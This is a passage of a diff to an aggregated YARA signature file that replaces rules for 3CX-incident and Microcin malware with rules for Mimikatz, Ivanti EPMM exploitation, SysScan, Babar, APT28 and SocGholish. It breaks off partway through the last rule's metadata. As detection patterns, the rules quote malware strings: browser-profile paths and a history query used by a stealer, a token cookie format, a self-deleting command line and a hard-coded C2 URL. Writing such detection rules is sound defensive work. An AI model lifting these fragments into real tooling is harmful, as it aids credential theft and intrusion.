+		tags = ""
 
 	strings:
-		$sa1 = "%s/.main_storage" ascii fullword
-		$sa2 = "%s/UpdateAgent" ascii fullword
-		$op1 = { 31 C0 41 80 34 06 ?? 48 FF C0 48 83 F8 ?? 75 ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F7 48 89 D9 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 F7 5B 41 5E 41 5F E9 ?? ?? ?? ?? 5B 41 5E 41 5F C3}
-		$op2 = { 0F 11 84 24 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 31 C0 80 B4 04 ?? ?? ?? ?? ?? 48 FF C0}
+		$xc1 = { 48 81 EC A8 00 00 00 C7 84 24 88 00 00 00 ?? ??
+               ?? ?? C7 84 24 8C 00 00 00 ?? ?? ?? ?? C7 84 24
+               90 00 00 00 ?? ?? ?? 00 C7 84 24 80 00 00 00 61
+               00 00 00 C7 44 24 40 5B 00 25 00 C7 44 24 44 30
+               00 38 00 C7 44 24 48 78 00 3A 00 C7 44 24 4C 25
+               00 30 00 C7 44 24 50 38 00 78 00 C7 44 24 54 5D
+               00 20 00 C7 44 24 58 25 00 77 00 C7 44 24 5C 5A
+               00 5C 00 C7 44 24 60 25 00 77 00 C7 44 24 64 5A
+               00 09 00 C7 44 24 68 25 00 77 00 C7 44 24 6C 5A
+               00 0A 00 C7 44 24 70 00 00 00 00 48 8D 94 24 80
+               00 00 00 48 8D 8C 24 88 00 00 00 48 B8 A0 7D ??
+               ?? ?? ?? 00 00 FF D0 }
 
 	condition:
-		(( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and filesize < 6MB and ( ( 1 of ( $sa* ) and 1 of ( $op* ) ) or all of ( $sa* ) ) ) or ( all of ( $op* ) )
+		$xc1
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_ICONIC_Stealer_Mar23_1 : FILE
+rule SIGNATURE_BASE_HKTL_Mimikatz_Icon : FILE
 {
 	meta:
-		description = "Detects ICONIC stealer payload used in the 3CX incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e92b5b90-1146-5235-9711-a4d42689c49b"
-		date = "2023-03-31"
+		description = "Detects mimikatz icon in PE file"
+		author = "Arnim Rupp"
+		id = "2a5ea476-a30d-5eac-b57a-3fb49386c046"
+		date = "2023-02-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/volexity/threat-intel/blob/main/2023/2023-03-30%203CX/attachments/iconicstealer.7z"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L279-L304"
+		reference = "https://blog.gentilkiwi.com/mimikatz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L218-L238"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1f57a2af4a5b9e71e2b72ddc3839400731d9d37eb4349c393b37b3f86c0c7f73"
-		score = 80
+		logic_hash = "a07d477d1645e6df4f0706e44df11ea006c89e4d3218ed18a8a97b60853ff4ff"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+		hash1 = "61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1"
+		hash2 = "1c3f584164ef595a37837701739a11e17e46f9982fdcee020cf5e23bad1a0925"
+		hash3 = "c6bb98b24206228a54493274ff9757ce7e0cbb4ab2968af978811cc4a98fde85"
+		hash4 = "721d3476cdc655305902d682651fffbe72e54a97cd7e91f44d1a47606bae47ab"
+		hash5 = "c0f3523151fa307248b2c64bdaac5f167b19be6fccff9eba92ac363f6d5d2595"
 
 	strings:
-		$s1 = "{\"HostName\": \"%s\", \"DomainName\": \"%s\", \"OsVersion\": \"%d.%d.%d\"}" wide fullword
-		$s2 = "******************************** %s ******************************" wide fullword
-		$s3 = "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" wide fullword
-		$s4 = "AppData\\Roaming\\Mozilla\\Firefox\\Profiles" wide fullword
-		$s5 = "SELECT url, title FROM urls ORDER BY id DESC LIMIT 500" wide fullword
-		$s6 = "TEXT value in %s.%s" ascii fullword
-		$op1 = { 48 63 d1 48 63 ce 49 03 d1 49 03 cd 4c 63 c7 e8 87 1f 09 00 8b 45 d0 44 8d 04 37 }
-		$op2 = { 48 8b c8 8b 56 f0 48 89 46 d8 e8 78 8f f8 ff e9 ec 13 00 00 c7 46 20 ff ff ff ff e9 e0 13 00 00 33 ff }
+		$ico = {79 e1 d7 ff 7e e5 db ff 7f e8 dc ff 85 eb dd ff ba ff f1 ff 66 a0 b6 ff 01 38 61 ff 22 50 75 c3}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and 4 of them or 6 of them
+		uint16( 0 ) == 0x5A4D and $ico and filesize < 10MB
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Macos_Elextron_App_Mar23_1 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Ivanti_EPMM_Mobileiron_Core_CVE_2023_35078_Jul23_1 : CVE_2023_35078
 {
 	meta:
-		description = "Detects macOS malware used in the 3CX incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7a3755d4-37e5-5d3b-93aa-34edb557f2d5"
-		date = "2023-03-31"
+		description = "Detects the successful exploitation of Ivanti Endpoint Manager Mobile (EPMM) / MobileIron Core CVE-2023-35078"
+		author = "Florian Roth"
+		id = "44cca0b5-3851-5786-82fd-ce3ccb566453"
+		date = "2023-07-25"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L306-L328"
+		reference = "Ivanti Endpoint Manager Mobile (EPMM) CVE-2023-35078 - Analysis Guidance"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "00dd28c3edd94e04e35ee9e3a43c30b5a0a1ad21ec8ecf2099bbeb9de2fca8d0"
-		score = 80
-		quality = 85
-		tags = "FILE"
-		hash1 = "51079c7e549cbad25429ff98b6d6ca02dc9234e466dd9b75a5e05b9d7b95af72"
-		hash2 = "f7ba7f9bf608128894196cf7314f68b78d2a6df10718c8e0cd64dbe3b86bc730"
+		logic_hash = "ebc59032b7450aa438ca30170560c95550cda6ff7774b8ce1486309716da9e6c"
+		score = 75
+		quality = 60
+		tags = "CVE-2023-35078"
 
 	strings:
-		$a1 = "com.apple.security.cs.allow-unsigned-executable-memory" ascii
-		$a2 = "com.electron.3cx-desktop-app" ascii fullword
-		$s1 = "s8T/RXMlALbXfowom9qk15FgtdI=" ascii
-		$s2 = "o8NQKPJE6voVZUIGtXihq7lp0cY=" ascii
+		$xr1 = /\/mifs\/aad\/api\/v2\/[^\n]{1,300} 200 [1-9][0-9]{0,60} /
 
 	condition:
-		uint16( 0 ) == 0xfacf and filesize < 400KB and ( all of ( $a* ) and 1 of ( $s* ) )
+		$xr1
 }
-rule SIGNATURE_BASE_MAL_3Cxdesktopapp_Macos_Updateagent_Mar23 : FILE
+rule SIGNATURE_BASE_MAL_WAR_Ivanti_EPMM_Mobileiron_Mi_War_Aug23 : CVE_2023_35078 FILE
 {
 	meta:
-		description = "Detects 3CXDesktopApp MacOS UpdateAgent backdoor component"
-		author = "Florian Roth (Nextron Systems)"
-		id = "596eb6d0-f96f-5106-ae67-9372d238e4cf"
-		date = "2023-03-30"
+		description = "Detects WAR file found in the Ivanti EPMM / MobileIron Core compromises exploiting CVE-2023-35078"
+		author = "Florian Roth"
+		id = "cd16cf29-a90d-5c3f-b66f-e9264dbf79fb"
+		date = "2023-08-01"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/patrickwardle/status/1641692164303515653?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L330-L354"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L16-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9e9a5f8d86356796162cee881c843cde9eaedfb3"
-		logic_hash = "0818a8f0b59a9baaefaa0b505f8261e0e0df283e79da8e95dc71e9afdca224ab"
-		score = 80
+		logic_hash = "0083727e34118d628c8507459bfb7f949f11af8197e201066e29e263e2c3f944"
+		score = 85
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-35078, FILE"
+		hash1 = "6255c75e2e52d779da39367e7a7d4b8d1b3c9c61321361952dcc05819251a127"
 
 	strings:
-		$a1 = "/3CX Desktop App/.main_storage" ascii
-		$x1 = ";3cx_auth_token_content=%s;__tutma=true"
-		$s1 = "\"url\": \"https://"
-		$s3 = "/dev/null"
-		$s4 = "\"AccountName\": \""
+		$s1 = "logsPaths.txt" ascii fullword
+		$s2 = "keywords.txtFirefox" ascii
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 6MB and ( 1 of ( $x* ) or ( $a1 and all of ( $s* ) ) ) or all of them
+		uint16( 0 ) == 0x4b50 and filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_2
+rule SIGNATURE_BASE_MAL_WAR_Ivanti_EPMM_Mobileiron_Logclear_JAVA_Aug23 : CVE_2023_35078 FILE
 {
 	meta:
-		description = "Detects malicious VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "ff1fa0bd-19b7-553a-9506-bc5aa5d29056"
-		date = "2023-04-29"
+		description = "Detects LogClear.class found in the Ivanti EPMM / MobileIron Core compromises exploiting CVE-2023-35078"
+		author = "Florian Roth"
+		id = "e1ef3bf3-0107-5ba6-a49f-71e079851a4f"
+		date = "2023-08-01"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L373-L392"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L34-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c4887a5cd6d98e273ba6e9ea3c1d8f770ef26239819ea24a1bfebd81d6870505"
-		logic_hash = "a15f7f06be5e620baf33d595afc35246dae0307978984af832940a74ef2c84eb"
+		logic_hash = "c42c2eca784d7089aab56addca11bad658a4a6c34a81ae823bd0c3dad41a1c99"
 		score = 80
 		quality = 85
-		tags = ""
+		tags = "CVE-2023-35078, FILE"
+		hash1 = "deb381c25d7a511b9eb936129eeba2c0341cff7f4bd2168b05e40ab2ee89225e"
 
 	strings:
-		$sa1 = "\\.\\pipe\\gecko.nativeMessaging" ascii
-		$sa2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40" ascii
-		$sa3 = "application/json, text/javascript, */*; q=0.01" ascii
-		$op1 = { 89 7? 24 ?? 44 8B CD 4C 8B C? 48 89 44 24 ?? 33 D2 33 C9 FF 15}
-		$op2 = { 4C 8B CB 4C 89 74 24 ?? 4C 8D 05 ?? ?? ?? ?? 44 89 74 24 ?? 33 D2 33 C9 FF 15}
-		$op3 = { 48 89 74 24 ?? 45 33 C0 89 74 24 ?? 41 B9 ?? ?? ?? ?? 89 74 24 ?? 48 8B D8 48 C7 00 ?? ?? ?? ?? 48 8B 0F 41 8D 50 ?? 48 89 44 24 ?? 89 74 24 ?? FF 15}
+		$s1 = "logsPaths.txt" ascii fullword
+		$s2 = "log file: %s, not read" ascii fullword
+		$s3 = "/tmp/.time.tmp" ascii fullword
+		$s4 = "readKeywords" ascii fullword
+		$s5 = "\"----------------  ----------------" ascii fullword
 
 	condition:
-		all of ( $op* ) or all of ( $sa* )
+		uint16( 0 ) == 0xfeca and filesize < 20KB and 4 of them or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_3
+
+rule SIGNATURE_BASE_BKDR_Snarasite_Oct17 : FILE
 {
 	meta:
-		description = "Detects malicious VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "6b6f984e-242a-5b84-baa9-6311992cde9b"
-		date = "2023-04-29"
+		description = "Auto-generated rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3a5d156a-529b-52ae-9b6a-d454895eb1fb"
+		date = "2017-10-07"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L394-L410"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_snarasite.yar#L3-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "595392959b609caf088d027a23443cf2fefd043607ccdec3de19ad3bb43a74b1"
-		logic_hash = "58f860926db4a7dfefbd39ee35efaa0081b7e31a361efce02f5144266ab652a6"
-		score = 80
+		logic_hash = "79f49bce6de996d20b64476feb73987fdcd7555963ea1a596648d8702fbd2898"
+		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$op1 = { 4C 8B CB 4C 89 74 24 ?? 4C 8D 05 ?? ?? ?? ?? 44 89 74 24 ?? 33 D2 33 C9 FF 15}
-		$op2 = { 89 7? 24 ?? 44 8B CD 4C 8B C? 48 89 44 24 ?? 33 D2 33 C9 FF 15}
-		$op3 = { 8B 54 24 ?? 4C 8D 4C 24 ?? 45 8D 46 ?? 44 89 74 24 ?? 48 8B CB FF 15}
-		$op4 = { 48 8D 44 24 ?? 45 33 C9 41 B8 01 00 00 40 48 89 44 24 ?? 41 8B D5 48 8B CF FF 15}
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "36ba92cba23971ca9d16a0b4f45c853fd5b3108076464d5f2027b0f56054fd62"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "322bef04e1e1ac48875036e38fb5c23c" or pe.imphash ( ) == "15088754757513c92fa36ba5590e907b" )
 }
-rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_4
+rule SIGNATURE_BASE_Xdedic_Sysscan_Unpacked : CRIMEWARE FILE
 {
 	meta:
-		description = "Detects malicious VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "77340ec0-36bb-5c47-995f-4e6f76b68fe1"
-		date = "2023-04-29"
+		description = "Detects SysScan APT tool"
+		author = " Kaspersky Lab"
+		id = "4f5d37b3-e3aa-51ec-b36e-b494c8abe227"
+		date = "2016-03-14"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L412-L428"
+		reference = "https://securelist.com/blog/research/75027/xdedic-the-shady-world-of-hacked-servers-for-sale/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sysscan.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9b0761f81afb102bb784b398b16faa965594e469a7fcfdfd553ced19cc17e70b"
-		logic_hash = "ad22df404d948073428fc35b0c8fbfea25da3bc66e46ea6397ff751ae65d5939"
-		score = 80
+		logic_hash = "df0834e89c512721547001c910c1461f028a46e954dd51017d4e8bde7893d04a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "CRIMEWARE, FILE"
+		maltype = "crimeware"
+		type = "crimeware"
+		filetype = "Win32 EXE"
+		version = "1.0"
+		hash1 = "fac495be1c71012682ebb27092060b43"
+		hash2 = "e8cc69231e209db7968397e8a244d104"
+		hash3 = "a53847a51561a7e76fd034043b9aa36d"
+		hash4 = "e8691fa5872c528cd8e72b82e7880e98"
+		hash5 = "F661b50d45400e7052a2427919e2f777"
 
 	strings:
-		$op1 = { 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 }
-		$op2 = { 48 8B C8 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C0 4C 8D 4D ?? B2 01 41 8D 48 ?? FF D0}
-		$op3 = { 33 FF C7 44 24 ?? 38 02 00 00 33 D2 8D 4F ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 FF 74 ?? 48 8D 54 24 ?? 48 8B C8 FF 15 }
-		$op4 = { 4C 8D 05 ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8B C8 33 D2 89 4C 24 ?? FF 15 }
+		$a1 = "/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"" ascii wide
+		$a2 = "SysScan DEBUG Mode!!!" ascii wide
+		$a3 = "This rechecking? (set 0/1 or press enter key)" ascii wide
+		$a4 = "http://37.49.224.144:8189/manual_result" ascii wide
+		$b1 = "Checker end work!" ascii wide
+		$b2 = "Trying send result..." ascii wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and filesize < 5000000 and ( any of ( $a* ) or all of ( $b* ) )
 }
-
-rule SIGNATURE_BASE_Microcin_Sample_1 : FILE
+rule SIGNATURE_BASE_Xdedic_Packed_Syscan : FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "96e9ac3b-a837-5909-b17b-259d54e0e7fd"
-		date = "2017-09-26"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Kaspersky Lab - modified by Florian Roth"
+		id = "da8e59f3-53f9-504b-afff-9caab798db6c"
+		date = "2016-07-02"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L13-L36"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sysscan.yar#L29-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e7eb967035257490db2537ba46fd1f1e378fc33f93e7f65412949e987194a9db"
+		logic_hash = "04eb5b056e892b2c2cf87e3770847226cccaceb1c743f3b9f8ac548026747ccf"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49816eefcd341d7a9c1715e1f89143862d4775ba4f9730397a1e8529f5f5e200"
-		hash2 = "a73f8f76a30ad5ab03dd503cc63de3a150e6ab75440c1060d75addceb4270f46"
-		hash3 = "9dd9bb13c2698159eb78a0ecb4e8692fd96ca4ecb50eef194fa7479cb65efb7c"
+		company = "Kaspersky Lab"
 
 	strings:
-		$s1 = "e Class Descriptor at (" ascii
-		$s2 = ".?AVCAntiAntiAppleFrameRealClass@@" fullword ascii
-		$s3 = ".?AVCAntiAntiAppleFrameBaseClass@@" fullword ascii
-		$s4 = ".?AVCAppleBinRealClass@@" fullword ascii
-		$s5 = ".?AVCAppleBinBaseClass@@" fullword ascii
+		$a1 = "SysScan.exe" nocase ascii wide
+		$a2 = "1.3.4." wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 4 of them or pe.imphash ( ) == "897077ca318eaf629cfe74569f10e023" ) )
+		uint16( 0 ) == 0x5A4D and filesize > 500KB and filesize < 1500KB and all of them
 }
-rule SIGNATURE_BASE_Microcin_Sample_2 : FILE
+rule SIGNATURE_BASE_SNOWGLOBE_Babar_Malware : FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+		description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8718ef84-be2b-55a6-a4bb-41161548a2b4"
-		date = "2017-09-26"
+		id = "53a61065-a3b3-563e-8ecc-513d8da68085"
+		date = "2015-02-18"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L38-L52"
+		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_snowglobe_babar.yar#L4-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99feb3e1672f69c4cf41a100e9ba64421fd75c3554306a1bf1475da6f1e14ed1"
-		score = 75
+		hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
+		logic_hash = "a93425a95efe471b815e2daf0b5e290b3472b722c6a48f8c22f0a6e9c588ffc9"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8a7d04229722539f2480270851184d75b26c375a77b468d8cbad6dbdb0c99271"
 
 	strings:
-		$s2 = "[Pause]" fullword ascii
-		$s7 = "IconCache_%02d%02d%02d%02d%02d" fullword ascii
+		$z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
+		$z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
+		$z2 = "ExecQueryFailled!" fullword ascii
+		$z3 = "NBOT_COMMAND_LINE" fullword
+		$z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
+		$s1 = "/s /n %s \"%s\"" fullword ascii
+		$s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
+		$s3 = "/c start /wait " fullword ascii
+		$s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
+		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" ascii
+		$x2 = "%COMMON_APPDATA%" fullword ascii
+		$x4 = "CONOUT$" fullword ascii
+		$x5 = "cmd.exe" fullword ascii
+		$x6 = "DLLPATH" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1MB and ( ( 1 of ( $z* ) and 1 of ( $x* ) ) or ( 3 of ( $s* ) and 4 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_Microcin_Sample_3 : FILE
+rule SIGNATURE_BASE_APT28_Hospitalitymalware_Document : FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "daecdfe3-e78c-55ee-83a3-3cee8cb9bb5f"
-		date = "2017-09-26"
+		description = "Yara Rule for APT28_Hospitality_Malware document identification"
+		author = "CSE CybSec Enterprise - Z-Lab"
+		id = "722e80ef-d729-5887-9853-cd06128f506d"
+		date = "2017-10-02"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L54-L68"
+		reference = "http://csecybsec.com/download/zlab/APT28_Hospitality_Malware_report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_hospitality.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf1227460f1fc4a7bede853b0d4f15b520db870ac7ce2e6684dc195ea6322e82"
+		logic_hash = "33c69e03e00c90dc0b673cdb042f8f979552086414bda9c9f17f3785214b05af"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f74a3b67c5ed6f38f08786f1601214412249fe128f12c51525135710d681e1d"
+		tlp = "white"
 
 	strings:
-		$x1 = "C:\\Users\\Lenovo\\Desktop\\test\\Release\\test.pdb" fullword ascii
-		$s2 = "test, Version 1.0" fullword wide
+		$a = {75 52 B9 ED 1B D6 83 0F DB 24 CA 87 4F 5F 25 36 BF 66 BA}
+		$b = {EC 3B 6D 74 5B C5 95 F3 9E 24 5B FE 4A 64 C7 09 CE 07 C9 58 4E 62 3B}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		all of them and filesize > 75KB and filesize < 82KB
 }
-rule SIGNATURE_BASE_Microcin_Sample_4 : FILE
+
+rule SIGNATURE_BASE_APT28_Hospitalitymalware_Mvtband_File
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8a6a0735-422a-5e91-9274-ce55f7bee5d3"
-		date = "2017-09-26"
+		description = "Yara Rule for mvtband.dll malware"
+		author = "CSE CybSec Enterprise - Z-Lab"
+		id = "f9e34c77-38b3-513e-bb29-148ac7058596"
+		date = "2017-10-02"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L70-L90"
+		reference = "http://csecybsec.com/download/zlab/APT28_Hospitality_Malware_report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy_hospitality.yar#L20-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1293fbd1a6b440168bb1d7b250df0c8a1a7f99a7fb603a6abec7fe7ba20cf4f5"
+		logic_hash = "d5da333444e7c9f023d9c6d8d1dec617859efdb26f9f6bc41e22ef27d2e3059a"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "92c01d5af922bdaacb6b0b2dfbe29e5cc58c45cbee5133932a499561dab616b8"
+		tags = ""
+		tlp = "white"
 
 	strings:
-		$s1 = "cmd /c dir /a /s \"%s\" > \"%s\"" fullword wide
-		$s2 = "ini.dat" fullword wide
-		$s3 = "winupdata" fullword wide
-		$f1 = "%s\\(%08x%08x)%s" fullword wide
-		$f2 = "%s\\d%08x\\d%08x.db" fullword wide
-		$f3 = "%s\\u%08x\\u%08x.db" fullword wide
-		$f4 = "%s\\h%08x\\h%08x.db" fullword wide
+		$a = "DGMNOEP"
+		$b = {C7 45 94 0A 25 73 30 8D 45 94}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or 5 of them )
+		all of them and pe.sections [ 2 ] . raw_data_size == 0
 }
-rule SIGNATURE_BASE_Microcin_Sample_5 : FILE
+rule SIGNATURE_BASE_MAL_ZIP_Socgholish_Mar21_1 : ZIP JS SOCGHOLISH FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cd06f9f7-0ba3-52c9-a814-be1cd53e2e42"
-		date = "2017-09-26"
+		description = "Triggers on small zip files with typical SocGholish JS files in it"
+		author = "Nils Kuhnert"
+		id = "da35eefd-b34d-59cd-8afc-da9c78ace96e"
+		date = "2021-03-29"
 		modified = "2023-12-05"
